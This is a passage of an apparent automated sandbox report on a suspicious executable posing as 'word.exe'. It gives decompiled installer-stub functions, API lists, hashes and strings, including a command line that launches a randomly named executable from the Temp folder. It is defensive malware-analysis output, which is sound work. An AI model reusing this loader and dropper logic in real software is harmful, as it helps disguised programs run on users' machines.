                                                          • Opcode Fuzzy Hash: 9efa1d1d8051c78a9919a677a3bcd6cf9f744936eeccd393b7e464826a275d3e
                                                          • Instruction Fuzzy Hash: A5015275D00219BADB10DBA4DC85BFFBBBCAB55B15F10412BBB00B72C0D7B469418BA5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401FAB Relevance: 9.1, APIs: 6, Instructions: 74libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 65%
                                                          			E00401FAB(int __ebx) {
				int _t28;
				struct HINSTANCE__* _t33;
				CHAR* _t35;
				intOrPtr* _t36;
				void* _t37;

				_t28 = __ebx;
				 *(_t37 - 4) = 1;
				SetErrorMode(0x8001);
				if( *0x423fd4 < __ebx) {
					_push(0xffffffe7);
					goto L14;
				} else {
					_t35 = E00402A85(0xfffffff0);
					 *(_t37 + 8) = E00402A85(1);
					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
						L3:
						_t33 = LoadLibraryExA(_t35, _t28, 8);
						if(_t33 == _t28) {
							_push(0xfffffff6);
							L14:
							E00401423();
						} else {
							goto L4;
						}
					} else {
						_t33 = GetModuleHandleA(_t35);
						if(_t33 != __ebx) {
							L4:
							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
							if(_t36 == _t28) {
								E00404E9F(0xfffffff7,  *(_t37 + 8));
							} else {
								 *(_t37 - 4) = _t28;
								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x424000, 0x40a7f8, 0x409000);
								} else {
									E00401423( *((intOrPtr*)(_t37 - 0x1c)));
									if( *_t36() != 0) {
										 *(_t37 - 4) = 1;
									}
								}
							}
							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
								FreeLibrary(_t33);
							}
						} else {
							goto L3;
						}
					}
				}
				SetErrorMode(_t28);
				 *0x423fa8 =  *0x423fa8 +  *(_t37 - 4);
				return 0;
			}








                                                          0x00401fab
                                                          0x00401fb3
                                                          0x00401fb6
                                                          0x00401fc2
                                                          0x00402065
                                                          0x00000000
                                                          0x00401fc8
                                                          0x00401fd0
                                                          0x00401fda
                                                          0x00401fdd
                                                          0x00401fec
                                                          0x00401ff6
                                                          0x00401ffa
                                                          0x00402061
                                                          0x00402067
                                                          0x00402067
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401fdf
                                                          0x00401fe6
                                                          0x00401fea
                                                          0x00401ffc
                                                          0x00402006
                                                          0x0040200a
                                                          0x0040204e
                                                          0x0040200c
                                                          0x0040200f
                                                          0x00402012
                                                          0x00402042
                                                          0x00402014
                                                          0x00402017
                                                          0x00402020
                                                          0x00402022
                                                          0x00402022
                                                          0x00402020
                                                          0x00402012
                                                          0x00402056
                                                          0x00402059
                                                          0x00402059
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00401fea
                                                          0x00401fdd
                                                          0x0040206d
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • SetErrorMode.KERNEL32(00008001), ref: 00401FB6
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401FE0
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1,000000E5), ref: 00404ED8
                                                            • Part of subcall function 00404E9F: lstrlenA.KERNEL32(?,0041FD08,?,00000000,?,?,?,?,?,?,?,?,?,?,?,004055E1), ref: 00404EE8
                                                            • Part of subcall function 00404E9F: lstrcatA.KERNEL32(0041FD08,?,?,0041FD08,?,00000000,?), ref: 00404EFB
                                                            • Part of subcall function 00404E9F: SetWindowTextA.USER32(0041FD08,0041FD08), ref: 00404F0D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F33
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F4D
                                                            • Part of subcall function 00404E9F: SendMessageA.USER32 ref: 00404F5B
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FF0
                                                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00402000
                                                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402059
                                                          • SetErrorMode.KERNEL32 ref: 0040206D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 1609199483-0
                                                          • Opcode ID: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                                                          • Instruction ID: 895be71df4ac45a5aeeb3ddaf5be92ea7e9d143a6a7ef1567a24186397f5d55d
                                                          • Opcode Fuzzy Hash: b3c38ef729e730e2157f884e1f611eeca49ccdf58f095c449bb0867d8dd0222c
                                                          • Instruction Fuzzy Hash: E4210B31D04315EBCB207FA5DE8C95F7A70AB45354B20413BF611B22E0CBBC4A82DA5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040567B Relevance: 9.0, APIs: 3, Strings: 3, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E0040567B(char _a4) {
				CHAR* _t3;
				char* _t5;
				CHAR* _t7;
				CHAR* _t8;
				void* _t10;

				_t1 =  &_a4; // 0x40543a
				_t8 =  *_t1;
				_t7 = CharNextA(_t8);
				_t3 = CharNextA(_t7);
				if( *_t8 == 0 ||  *_t7 != 0x5c3a) {
					if( *_t8 != 0x5c5c) {
						L8:
						return 0;
					}
					_t10 = 2;
					while(1) {
						_t10 = _t10 - 1;
						_t5 = E00405612(_t3, 0x5c);
						if( *_t5 == 0) {
							goto L8;
						}
						_t3 = _t5 + 1;
						if(_t10 != 0) {
							continue;
						}
						return _t3;
					}
					goto L8;
				} else {
					return CharNextA(_t3);
				}
			}








                                                          0x00405684
                                                          0x00405684
                                                          0x0040568b
                                                          0x0040568e
                                                          0x00405693
                                                          0x004056a6
                                                          0x004056c0
                                                          0x00000000
                                                          0x004056c0
                                                          0x004056aa
                                                          0x004056ab
                                                          0x004056ae
                                                          0x004056af
                                                          0x004056b7
                                                          0x00000000
                                                          0x00000000
                                                          0x004056b9
                                                          0x004056bc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004056bc
                                                          0x00000000
                                                          0x0040569c
                                                          0x00000000
                                                          0x0040569d

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharNext
                                                          • String ID: :T@$C:\$C:\Users\user\AppData\Roaming\word.exe
                                                          • API String ID: 3213498283-17942376
                                                          • Opcode ID: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                                                          • Instruction ID: 378ecf4657a12380a446d3b042b521289e3ad6747402889725e3da158347204d
                                                          • Opcode Fuzzy Hash: c9ad8db627268ba57fcb43cc5b96729aaa8b730050f8728a8f55b3ef95fa2c5f
                                                          • Instruction Fuzzy Hash: 2DF02751A10F215AEB2222644C54B7B6BACDB55320F440C37E544F61E0C3BD4C92CFAE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401E0E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 64%
                                                          			E00401E0E() {
				signed int _t7;
				void* _t19;
				char* _t20;
				signed int _t24;
				void* _t26;

				_t24 = E00402A85(_t19);
				_t20 = E00402A85(0x31);
				_t7 = E00402A85(0x22);
				_push(_t20);
				_push(_t24);
				_t22 = _t7;
				wsprintfA("C:\Users\Albus\AppData\Local\Temp", "%s %s");
				E00401423(0xffffffec);
				asm("sbb eax, eax");
				asm("sbb eax, eax");
				if(ShellExecuteA( *(_t26 - 8),  ~( *_t24) & _t24, _t20,  ~( *_t7) & _t22, "C:\\Users\\Albus\\AppData\\Local\\Temp",  *(_t26 - 0x18)) < 0x21) {
					 *((intOrPtr*)(_t26 - 4)) = 1;
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t26 - 4));
				return 0;
			}








                                                          0x00401e16
                                                          0x00401e1f
                                                          0x00401e21
                                                          0x00401e26
                                                          0x00401e27
                                                          0x00401e32
                                                          0x00401e34
                                                          0x00401e3f
                                                          0x00401e4b
                                                          0x00401e59
                                                          0x00401e6b
                                                          0x004026bf
                                                          0x004026bf
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • wsprintfA.USER32 ref: 00401E34
                                                          • ShellExecuteA.SHELL32(?,00000000,00000000,00000000,C:\Users\user\AppData\Local\Temp,?), ref: 00401E62
                                                          Strings
                                                          • %s %s, xrefs: 00401E28
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E2D
                                                          • C:\Users\user\AppData\Local\Temp, xrefs: 00401E4D
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ExecuteShellwsprintf
                                                          • String ID: %s %s$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp
                                                          • API String ID: 2956387742-4169097713
                                                          • Opcode ID: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
                                                          • Instruction ID: 51fa150e18871bc54a8ab07165f54a8d5d4e89d78de25ff2bd43d0f4b5788034
                                                          • Opcode Fuzzy Hash: 11ad7f7c5c1444f88ce3475004efd9ca3d6a51d10184ad68cd4a8bd84c741c2f
                                                          • Instruction Fuzzy Hash: E6F0D171B04100ABC721AFB59D4EEA93BA8DB45318B600936F800F61D2E5BC89519668
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402AC5 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 84%
                                                          			E00402AC5(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423fd0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402AC5(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405DDA(2);
					if(_t27 == 0) {
						if( *0x423fd0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423fd0, 0);
				}
				return _t18;
			}








                                                          0x00402ae6
                                                          0x00402aee
                                                          0x00402b16
                                                          0x00402b00
                                                          0x00402b50
                                                          0x00402b56
                                                          0x00000000
                                                          0x00402b58
                                                          0x00402b14
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b14
                                                          0x00402b2b
                                                          0x00402b33
                                                          0x00402b3a
                                                          0x00402b66
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b6e
                                                          0x00402b76
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00402b76
                                                          0x00000000
                                                          0x00402b49
                                                          0x00402b5d

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402AE6
                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402B22
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B2B
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402B50
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B6E
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                                                          • Instruction ID: a2f84c9fc7c0001da7a9db1dd1493ef20417761c41d84b505e0dd7cc978203d5
                                                          • Opcode Fuzzy Hash: 6193cb83436fc6245e3a5efdc8bf0894ad9ac27bdffc2be9ba814b179149cdd5
                                                          • Instruction Fuzzy Hash: 17116D31A00009FEDF21AF90DE48EAF3B7DEB44344B104036FA05B50A0D3B4AE52AB69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401D0E Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00401D0E(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x48);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A85(_t21), _t21,  *(_t27 - 0x40) *  *(_t27 - 0x1c),  *(_t27 - 0x3c) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                          0x00401d18
                                                          0x00401d1f
                                                          0x00401d4e
                                                          0x00401d56
                                                          0x00401d5d
                                                          0x00401d5d
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                                                          • Instruction ID: 353d02df9da9ec42832837f4cb5a1f013013b856dd18917493dbd5b1045c63a4
                                                          • Opcode Fuzzy Hash: f65b58a9a69f61d8a4c29f45d192000902f49200d225abf32fafad8663802e32
                                                          • Instruction Fuzzy Hash: 25F0F9B2E04104BFD700DFA4EE88DAFB7BCEB44311B005476F602F21A1C6789E428B69
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040468C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 35%
                                                          			E0040468C(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B16(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B16(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B16(_t34, 0, 0x420530, 0x420530, _a8);
				wsprintfA(_t26 + lstrlenA(0x420530), "%u.%u%s%s");
				return SetDlgItemTextA( *0x4236f8, _a4, 0x420530);
			}













                                                          0x00404694
                                                          0x00404698
                                                          0x004046a0
                                                          0x004046a3
                                                          0x004046a4
                                                          0x004046a6
                                                          0x004046a8
                                                          0x004046ab
                                                          0x004046ab
                                                          0x004046b2
                                                          0x004046b8
                                                          0x004046b8
                                                          0x004046bf
                                                          0x004046ca
                                                          0x004046cb
                                                          0x004046ce
                                                          0x004046ce
                                                          0x004046db
                                                          0x004046e6
                                                          0x004046e9
                                                          0x004046fb
                                                          0x00404702
                                                          0x00404703
                                                          0x00404712
                                                          0x00404722
                                                          0x0040473e

                                                          APIs
                                                          • lstrlenA.KERNEL32(00420530,00420530,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004045AC,000000DF,?,00000000,00000400), ref: 0040471A
                                                          • wsprintfA.USER32 ref: 00404722
                                                          • SetDlgItemTextA.USER32(?,00420530), ref: 00404735
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                                                          • Instruction ID: fc2b73f6c965b4b8d77eae39fc1b1cea645aa0e87c551c7386791207db77a036
                                                          • Opcode Fuzzy Hash: f34471263a09e869a70bf48e133dd6383d7562b6fbf9109ed4405ac788a63cd4
                                                          • Instruction Fuzzy Hash: B7110473B001243BDB106A699C06EAF369DCBC2374F14063BFA25F61D1E979AC5186EC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00401BF8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 54%
                                                          			E00401BF8(void* __ecx) {
				signed int _t30;
				CHAR* _t33;
				long _t34;
				int _t39;
				signed int _t40;
				int _t44;
				void* _t46;
				int _t51;
				struct HWND__* _t55;
				void* _t58;

				_t46 = __ecx;
				 *(_t58 - 8) = E00402A85(0x33);
				 *(_t58 + 8) = E00402A85(0x44);
				if(( *(_t58 - 0x10) & 0x00000001) == 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00405A6B(__ecx,  *((intOrPtr*)(__ebp - 8)));
				}
				__eflags =  *(_t58 - 0x10) & 0x00000002;
				if(( *(_t58 - 0x10) & 0x00000002) == 0) {
					 *(_t58 + 8) = E00405A6B(_t46,  *(_t58 + 8));
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t53 = E00402A85();
					_t30 = E00402A85();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t33 =  ~( *_t29) & _t53;
					__eflags = _t33;
					_t34 = FindWindowExA( *(_t58 - 8),  *(_t58 + 8), _t33,  ~( *_t30) & _t30);
					goto L10;
				} else {
					_t55 = E00402A68();
					_t39 = E00402A68();
					_t51 =  *(_t58 - 0x10) >> 2;
					if(__eflags == 0) {
						_t34 = SendMessageA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8));
						L10:
						 *(_t58 - 0x3c) = _t34;
					} else {
						_t40 = SendMessageTimeoutA(_t55, _t39,  *(_t58 - 8),  *(_t58 + 8), _t44, _t51, _t58 - 0x3c);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t58 - 4)) =  ~_t40 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t58 - 0x24)) - _t44;
				if( *((intOrPtr*)(_t58 - 0x24)) >= _t44) {
					_push( *(_t58 - 0x3c));
					E00405A52();
				}
				 *0x423fa8 =  *0x423fa8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}













                                                          0x00401bf8
                                                          0x00401c01
                                                          0x00401c0d
                                                          0x00401c10
                                                          0x00401c1a
                                                          0x00401c1a
                                                          0x00401c1d
                                                          0x00401c21
                                                          0x00401c2b
                                                          0x00401c2b
                                                          0x00401c2e
                                                          0x00401c32
                                                          0x00401c34
                                                          0x00401c81
                                                          0x00401c83
                                                          0x00401c8c
                                                          0x00401c94
                                                          0x00401c97
                                                          0x00401c97
                                                          0x00401ca0
                                                          0x00000000
                                                          0x00401c36
                                                          0x00401c3d
                                                          0x00401c3f
                                                          0x00401c47
                                                          0x00401c4a
                                                          0x00401c72
                                                          0x00401ca6
                                                          0x00401ca6
                                                          0x00401c4c
                                                          0x00401c5a
                                                          0x00401c62
                                                          0x00401c65
                                                          0x00401c65
                                                          0x00401c4a
                                                          0x00401ca9
                                                          0x00401cac
                                                          0x00401cb2
                                                          0x004028c2
                                                          0x004028c2
                                                          0x0040291d
                                                          0x00402929

                                                          APIs
                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C5A
                                                          • SendMessageA.USER32 ref: 00401C72
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945471014.000000000040B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945488429.0000000000421000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945497852.0000000000429000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945504833.000000000042C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                                                          • Instruction ID: 5a4a2a8e5e05dedb88239c733a2ad51f89d43fb5ccd06698c145dfd913d610d3
                                                          • Opcode Fuzzy Hash: a9b904d63b631f8314da7113b300116abf6452c146d942a46b795a4faaa52b4b
                                                          • Instruction Fuzzy Hash: CD217C71E44108BFEF029FB0C94AAAD7BB5EB44308F14457AF901B61E1DBB98A419B58
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004059DB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 88%
                                                          			E004059DB(void* _a4, int _a8, char* _a12, int _a16, void* _a20) {
				long _t20;
				char* _t26;

				asm("sbb eax, eax");
				_t26 = _a16;
				 *_t26 = 0;
				_t20 = RegOpenKeyExA(_a4, _a8, 0,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				if(_t20 == 0) {
					_a8 = 0x400;
					if(RegQueryValueExA(_a20, _a12, 0,  &_a16, _t26,  &_a8) != 0 || _a16 != 1 && _a16 != 2) {
						 *_t26 = 0;
					}
					_t26[0x3ff] = 0;
					return RegCloseKey(_a20);
				}
				return _t20;
			}





                                                          0x004059eb
                                                          0x004059ed
                                                          0x004059fa
                                                          0x00405a04
                                                          0x00405a0c
                                                          0x00405a11
                                                          0x00405a2d
                                                          0x00405a3b
                                                          0x00405a3b
                                                          0x00405a40
                                                          0x00000000
                                                          0x00405a46
                                                          0x00405a4f

                                                          APIs
                                                          • RegOpenKeyExA.ADVAPI32(0041FD08,00000006,00000000,-00004250,-00004250), ref: 00405A04
                                                          • RegQueryValueExA.ADVAPI32 ref: 00405A25
                                                          • RegCloseKey.ADVAPI32(-00004250), ref: 00405A46
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw, xrefs: 004059DE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.945445823.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.945441190.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945456325.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000004.00000002.945466320.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
